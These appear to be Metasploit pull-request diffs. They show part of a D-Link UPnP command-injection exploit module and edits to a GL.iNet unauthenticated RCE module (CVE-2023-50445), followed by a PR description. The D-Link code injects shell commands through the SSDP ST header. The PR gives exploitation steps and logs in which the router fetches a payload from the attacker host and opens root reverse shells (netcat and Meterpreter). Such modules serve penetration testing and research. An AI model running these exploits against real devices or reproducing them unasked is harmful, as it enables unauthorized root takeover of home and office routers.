+        'data' => xml_soap_data.to_s,
+        'headers' => {
+          'SOAPACTION' => '"http://purenetworks.com/HNAP1/GetDeviceSettings"'
+        }
+      })
+      if res && res.code == 200 && res.body.include?('<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>')
+        xml = res.get_xml_document
+        unless xml.blank?
+          xml.remove_namespaces!
+          @d_link['product'] = xml.css('ModelName').text
+          @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
+          @d_link['hardware'] = xml.css('HardwareVersion').text
+        end
+      end
+    end
+
+    # USE CASE #6: D-Link devices with dynamically generated version and hardware information
+    # Create a DHMAPI POST request to get these hardware details
+    if @d_link['product'].nil?
+      xml_soap_data = <<~EOS
+        <?xml version="1.0" encoding="utf-8"?>
+          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+            <soap:Body>
+              <GetDeviceSettings/>
+            </soap:Body>
+          </soap:Envelope>
+      EOS
+      res = send_request_cgi({
+        'rport' => datastore['HTTP_PORT'],
+        'method' => 'POST',
+        'ctype' => 'text/xml',
+        'uri' => normalize_uri(target_uri.path, 'DHMAPI', '/'),
+        'data' => xml_soap_data.to_s,
+        'headers' => {
+          'API-ACTION' => 'GetDeviceSettings'
+        }
+      })
+      if res && res.code == 200 && res.body.include?('<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>')
+        xml = res.get_xml_document
+        unless xml.blank?
+          xml.remove_namespaces!
+          @d_link['product'] = xml.css('ModelName').text
+          @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
+          @d_link['hardware'] = xml.css('HardwareVersion').text
+        end
+      end
+    end
+
+    # check the vulnerable product and firmware versions
+    case @d_link['product']
+    when 'GO-RT-AC750'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.01') && @d_link['hardware'][0] == 'A'
+    when 'DIR-300'
+      if Rex::Version.new(@d_link['firmware']) >= Rex::Version.new('2.00') && Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.15') # hardware version B
+        @d_link['arch'] = 'mipsle'
+        return true
+      elsif Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') # hardware version A
+        @d_link['arch'] = 'mipsbe'
+        return true
+      end
+    when 'DIR-600'
+      @d_link['arch'] = 'mipsle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.18') && @d_link['hardware'][0] == 'B'
+    when 'DIR-645'
+      @d_link['arch'] = 'mipsle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+    when 'DIR-815'
+      @d_link['arch'] = 'mipsle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04')
+    when 'DIR-816L'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.06') && (@d_link['hardware'][0] == 'B' || @d_link['hardware'] == 'N/A')
+    when 'DIR-817LW'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+    when 'DIR-818LW', 'DIR-818L'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.04') && @d_link['hardware'][0] == 'B'
+
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && @d_link['hardware'][0] == 'A'
+    when 'DIR-822'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('3.12') && @d_link['hardware'][0] == 'C'
+    when 'DIR-823'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.00') && @d_link['hardware'][0] == 'A'
+    when 'DIR-845L'
+      @d_link['arch'] = 'mipsle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.02') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+    when 'DIR-850L'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+    when 'DIR-859'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') && @d_link['hardware'][0] == 'A'
+    when 'DIR-860L'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.10') && @d_link['hardware'][0] == 'A'
+
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+    when 'DIR-865L'
+      @d_link['arch'] = 'mipsle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.07') && @d_link['hardware'][0] == 'A'
+    when 'DIR-868L'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.05') && @d_link['hardware'][0] == 'B'
+    when 'DIR-869'
+      @d_link['arch'] = 'mipsbe'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.03') && @d_link['hardware'][0] == 'A'
+    when 'DIR-880L'
+      @d_link['arch'] = 'armle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.08') && @d_link['hardware'][0] == 'A'
+    when 'DIR-890L', 'DIR-890R'
+      @d_link['arch'] = 'armle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.11') && @d_link['hardware'][0] == 'A'
+    when 'DIR-885L', 'DIR-885R'
+      @d_link['arch'] = 'armle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+    when 'DIR-895L', 'DIR-895R'
+      @d_link['arch'] = 'armle'
+      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+    end
+    false
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = "#{datastore['URN']};`#{cmd}`"
+
+    connect_udp
+    header = "M-SEARCH * HTTP/1.1\r\n"
+    header << 'HOST:' + datastore['RHOST'].to_s + ':' + datastore['RPORT'].to_s + "\r\n"
+    header << "ST:#{payload}\r\n"
+    header << "MX:2\r\n"
+    header << "MAN:\"ssdp:discover\"\r\n\r\n"
+    udp_sock.put(header)
+    disconnect_udp
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'rport' => datastore['HTTP_PORT'],
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    # Check if target is a D-Link network device
+    return CheckCode::Unknown('No response received from target.') unless res
+    return CheckCode::Safe('Likely not a D-Link network device.') unless res.code == 200 && res.body =~ /d-?link/i
+
+    # check if firmware version is vulnerable
+    return CheckCode::Appears("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") if vuln_version?(res)
+    # D-link devices with fixed firmware versions
+    return CheckCode::Safe("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['arch'].nil?
+    # D-link devices that still could be vulnerable with product information
+    return CheckCode::Detected("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['product'].nil?
+
+    # D-link devices that still could be vulnerable but no product information available
+    return CheckCode::Detected
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
+    end
+  end
+end

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           - SFT1200: v4.3.6;
           - and potentially others (just try ;-)
 
-          NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
           when using the Linux Dropper target.
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  include Msf::Exploit::Remote::Udp
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -56,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],
           ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
         ],
-        'DisclosureDate' => '2013-12-10',
+        'DisclosureDate' => '2023-12-10',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
         'Privileged' => true,

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -29,10 +29,10 @@ class MetasploitModule < Msf::Exploit::Remote
           retrieved without knowing a valid username and password.
 
           The following GL.iNet network products are vulnerable:
-          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
-          - MT6000 => v4.5.0 - v4.5.3;
-          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
-          - E750/E750V2, MV1000 => v4.3.8;
+          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
+          - MT6000: v4.5.0 - v4.5.3;
+          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
+          - E750/E750V2, MV1000: v4.3.8;
           - and potentially others (just try ;-)
 
           NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
@@ -249,7 +249,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'get_system_log',
         {
           lines: '',
-          module: "| #{cmd}"
+          module: "|#{cmd}"
         }
       ]
     }.to_json


### PR DESCRIPTION
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log` interface in the `logread` module.

This exploit requires post-authentication using the `Admin-Token` cookie / session ID (`SID`), typically stolen by the attacker.
However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie / `SID` can be retrieved without knowing a valid username and password. 

The following GL.iNet network products are vulnerable:
 - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
 - MT6000: v4.5.0 - v4.5.3;
 - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
 - E750/E750V2, MV1000: v4.3.8;
 -  X3000: v4.0.0 - v4.4.2;
 - XE3000: v4.0.0 - v4.4.3;
 - SFT1200: v4.3.6;
 - and potentially others (just try ;-)

This module has been tested via FirmAE running on Kali Linux 2023.11 at the following emulated targets:
* GL.iNet Router model AR300M with  firmware v4.3.7
* GL.iNet Router model AR300M16 with  firmware v4.3.7
* GL.iNet Router model MT300N-V2 with  firmware v4.3.7
* GL.iNet Router model MT1300 with  firmware v4.3.7

## Installation steps to emulate the router firmware with FirmAE
* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE). 
* To emulate the specific firmware that comes with the GL.iNet devices, `binwalk` might need to be able to handle a sasquatch filesystem which requires a bit of additional installation and compilation steps that you can find [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689). Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
* Download  the vulnerable firmware from GL.iNet [here](https://dl.gl-inet.com/?model=ar300m16). We will pick `openwrt-ar300m16-4.3.7-0913-1694589994.bin` for the demonstration.
* Start emulation.
* First run `./init.sh` to initialize and start the Postgress database.
* Start a debug session  `./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin`
* This will take a while, but in the end you should see the following...
```shell
# ./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin
[*] /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.47.0 (5-Feb-2023)
mknod: /dev/console: File exists
e2fsck 1.47.0 (5-Feb-2023)
[*] infer network start!!!

[IID] 91
[MODE] debug
[+] Network reachable on 192.168.1.1!
[+] Run debug!
Creating TAP device tap91_0...
Set 'tap91_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.1.1 true false 11.438110994 -1
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  import telnetlib
[*] firmware - openwrt-ar300m16-4.3.7-0913-1694589994
[*] IP - 192.168.1.1
[*] connecting to netcat (192.168.1.1:31337)
[-] failed to connect netcat
------------------------------
|       FirmAE Debugger      |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 1
/ #
/ # ifconfig
ifconfig
br-lan    Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:392 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:33970 (33.1 KiB)  TX bytes:0 (0.0 B)

eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:427 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:42072 (41.0 KiB)  TX bytes:5068 (4.9 KiB)

eth1      Link encap:Ethernet  HWaddr 52:54:00:12:34:57
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:940 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:321480 (313.9 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # netstat -rn
netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
192.168.8.0     0.0.0.0         255.255.255.0   U         0 0          0 br-lan
```
* You should now be able to `ping` the network address 192.168.8.1 from your host and run a `nmap` command to check the services (HTTP TCP port 80).
* NOTE: please check your tap network interface on your host because it might have the wrong IP setting. 
* You can change this with: `ip a del 192.168.1.2/24 dev tap91_0` and `ip a add 192.168.8.2/24 dev tap91_0`.

```shell
 # ifconfig tap91_0
tap91_0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.2  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::6c06:aff:fefb:ab29  prefixlen 64  scopeid 0x20<link>
        ether 6e:06:0a:fb:ab:29  txqueuelen 1000  (Ethernet)
        RX packets 39  bytes 4692 (4.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 50  bytes 4044 (3.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```
```shell
# ping 192.168.8.1
PING 192.168.8.1 (192.168.8.1) 56(84) bytes of data.
64 bytes from 192.168.8.1: icmp_seq=1 ttl=64 time=9.2 ms
64 bytes from 192.168.8.1: icmp_seq=2 ttl=64 time=3.18 ms
^C
--- 192.168.8.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
# nmap 192.168.8.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 14:47 UTC
Nmap scan report for 192.168.8.1
Host is up (0.020s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https
MAC Address: 52:54:00:12:34:57 (QEMU virtual NIC)
```
You are now ready to test the module using the emulated router hardware on IP address 192.168.8.1.

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/glinet_unauth_rce_cve_2023_50445`
- [x] `set rhosts <ip-target>`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=Unix Command, 1=Linux Dropper>`
- [x] `exploit`

you should get a `shell` or `Meterpreter`.
```shell
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > info

       Name: GL.iNet Unauthenticated Remote Command Execution via the logread module.
     Module: exploit/linux/http/glinet_unauth_rce_cve_2023_50445
   Platform: Unix, Linux
       Arch: cmd, mipsle, mipsbe, armle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-12-10

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Unknown
  DZONERZY

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix Command
      1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT    80               yes       The target port (UDP)
  SID                       no        Session ID
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen o
                                      n all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
  to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
  interface in the `logread` module.
  This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
  by the attacker.
  However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
  through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
  retrieved without knowing a valid username and password.

  The following GL.iNet network products are vulnerable:
  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
  - MT6000 => v4.5.0 - v4.5.3;
  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
  - E750/E750V2, MV1000 => v4.3.8;
  - and potentially others (just try ;-)

  NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
  when using the Linux Dropper target.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-50445
  https://nvd.nist.gov/vuln/detail/CVE-2023-50919
  https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445
  https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919
  https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html
  https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md


View the full module info with the info -d command.
```
## Scenarios
###  FirmAE GL.iNet AR300M16 Router Emulation Unix Command -  cmd/unix/reverse_netcat
```shell
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 0
target => 0
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit

[*] Started reverse TCP handler on 192.168.8.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.8.1:80 can be exploited.
[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
[*] SID: NsPHdkXtENoaotxVZWLqJorU52O7J0OI
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 8 opened (192.168.8.2:4444 -> 192.168.8.1:53167) at 2024-01-03 11:12:18 +0000

pwd
/
id
uid=0(root) gid=0(root) groups=0(root),65533(nonevpn)
uname -a
Linux GL- 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
exit
```
### FirmAE GL.iNet AR300M16 Router Emulation Linux Dropper -  linux/mipsbe/meterpreter_reverse_tcp
```shell
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 1
target => 1
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit

[*] Started reverse TCP handler on 192.168.8.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.8.1:80 can be exploited.
[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
[*] SID: Gs2KPnIsIQQUzHQkEBVN8JOcq5nV008e
[*] Executing Linux Dropper for linux/mipsbe/meterpreter_reverse_tcp
[*] Using URL: http://192.168.8.2:1981/OrfVHM15cua0w
[*] Client 192.168.8.1 (curl/7.88.1) requested /OrfVHM15cua0w
[*] Sending payload to 192.168.8.1 (curl/7.88.1)
[*] Meterpreter session 9 opened (192.168.8.2:4444 -> 192.168.8.1:48511) at 2024-01-03 08:30:52 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.8.1
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > 
```
## Limitations
Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.